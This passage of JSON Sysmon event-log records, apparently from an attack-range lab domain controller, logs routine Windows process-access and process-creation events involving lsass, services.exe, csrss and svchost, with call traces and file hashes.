07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.243\r\nProcessGuid: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nProcessId: 2240\r\nImage: C:\\Windows\\System32\\svchost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for Windows Services\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: svchost.exe\r\nCommandLine: C:\\Windows\\System32\\svchost.exe -k smbsvcs\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6\r\nParentProcessGuid: {41C8662E-1F61-5F25-0000-00102F530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.243","ProcessGuid":"{41C8662E-1F6D-5F25-0000-0010029D0200}","Image":"C:\\Windows\\System32\\svchost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for Windows Services","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"svchost.exe","CommandLine":"C:\\Windows\\System32\\svchost.exe -k smbsvcs","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6","ParentProcessGuid":"{41C8662E-1F61-5F25-0000-00102F530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.236\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 936\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F6D-5F25-0000-0010029D0200}\r\nTargetProcessId: 2240\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.236","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"936","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F6D-5F25-0000-0010029D0200}","TargetProcessId":"2240","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:17.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"996","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F5F-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:17.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 996\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F5F-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 